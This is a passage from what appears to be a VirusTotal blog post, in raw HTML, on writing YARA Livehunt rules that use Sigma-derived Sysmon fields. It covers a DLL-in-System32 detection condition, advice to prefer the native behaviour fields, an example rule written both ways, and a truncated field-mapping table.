vt.behaviour.sigma_analysis_results: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results_match_context </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results.match_context: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"TargetFilename"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">startswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"C:\\Windows\\System32\\"</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">and</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"TargetFilename"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">endswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">".dll"</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">and</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_metadata_tags </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt.metadata.tags: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> vt_metadata_tags
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">icontains</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"cve-"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">}</span>
</p></div>
<h2 style="text-align: left;">Sysmon EVTX fields - overlaps
</h2>
<div class="interval_12"> Some of the details found in Sysmon EVTX fields (available in the VT samples’ JSON structure) duplicate details already provided by the more traditional fields you use in your Livehunt rules through the YARA VT module.
</div>
<div class="interval_12"> For example, instead of:
<mark class="my-yara-code">vt_behaviour_sigma_analysis_results_match_context.values["TargetFilename"]</mark> from <mark class="my-yara-code">vt.behaviour.sigma_analysis_results</mark>
</div>
<div class="interval_12"> you could use: <mark class="my-yara-code">vt.behaviour.files_written</mark> to identify file creation events.
</div>
<div class="interval_12"> When that’s the case, we recommend using traditional <a href="https://docs.virustotal.com/docs/writing-yara-rules-for-livehunt" target="_blank">fields</a> found in VT samples’ structure for the following reasons:
</div>
<div class="interval_12"> <ul>
<li>Only the part of the Sysmon information that matched the Sigma rule is fully stored and indexed, which limits YARA hunting on these fields.
</li>
<li>We mapped most Sysmon fields into the YARA VT module for simplicity.
</li>
<li>Linux and macOS samples do not have any Sysmon information related to Sigma rules. Similar details about the match can be found under the “behaviour” JSON structure entry.
</li>
</ul> </div>
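<div class="interval_12"> To make the overlap concrete, the following added example (not a rule from this post) writes the same file-creation check both ways: first through the Sigma match context, then through the native <mark class="my-yara-code">vt.behaviour.files_written</mark> field recommended above. The path fragment is a constructed placeholder, and the loop-variable names follow the module’s naming convention.
</div>

```yara
import "vt"

// Added example: the same detection written against the Sigma match context
// (only the part of the Sysmon data that matched a Sigma rule is indexed) and
// against the native VT field (indexed for every Windows sandbox report).
// "\\Temp\\" is a constructed placeholder path fragment, not a real indicator.

rule files_written_via_sigma_context
{
  meta:
    description = "File creation event located through the Sigma match context only"
  condition:
    for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results : (
      for any vt_behaviour_sigma_analysis_results_match_context in vt_behaviour_sigma_analysis_results.match_context : (
        vt_behaviour_sigma_analysis_results_match_context.values["TargetFilename"] icontains "\\Temp\\"
      )
    )
}

rule files_written_via_native_field
{
  meta:
    description = "Same check on vt.behaviour.files_written, the recommended field"
  condition:
    // Equivalent VT Intelligence query per the mapping table below: behavior_files:"\\Temp\\"
    for any vt_behaviour_files_written in vt.behaviour.files_written : (
      vt_behaviour_files_written icontains "\\Temp\\"
    )
}
```

The second rule also matches Linux and macOS sandbox reports, which carry no Sysmon-derived Sigma context at all.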
<div class="interval_12"> The new Sysmon-like details offered in the file “structure” also make VT an excellent platform for researchers and Sigma rule creators, allowing them to leverage this information without the need to create their own lab.
</div>
<div class="interval_12"> The following table helps map VT Intelligence queries, YARA VT module fields, Sigma categories, and Sigma fields to one another:
</div>
<div class="interval_12">
<table style="border-collapse: collapse; border: none;">
<colgroup>
<col width="152">
</col>
<col width="185">
</col>
<col width="144">
</col>
<col width="144">
</col>
</colgroup>
<tbody>
<tr style="height: 15.75pt;" class="table-fields">
<td
style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">VT
Intelligence</span></p>
</td>
<td
style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">YARA
VT module field</span></p>
</td>
<td
style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Sigma
Category</span></p>
</td>
<td
style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Sigma
Field</span></p>
</td>
</tr>
<tr style="height: 60pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_created_processes</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_created</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentCommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">OriginalFileName</span>
</p>
</td>
</tr>
<tr style="height: 127.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_files</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_attribute_changed
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_deleted</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_opened</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_copied
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_copied[x].destination</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_copied[x].source</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_written</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped[x].path</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped[x].sha256</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped[x].type</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_access</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_change</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_delete</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_rename</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_event</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetFilename</span>
</p>
</td>
</tr>
<tr style="height: 93.75pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_injected_processes</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_injected</span>
</p>
</td>
<td
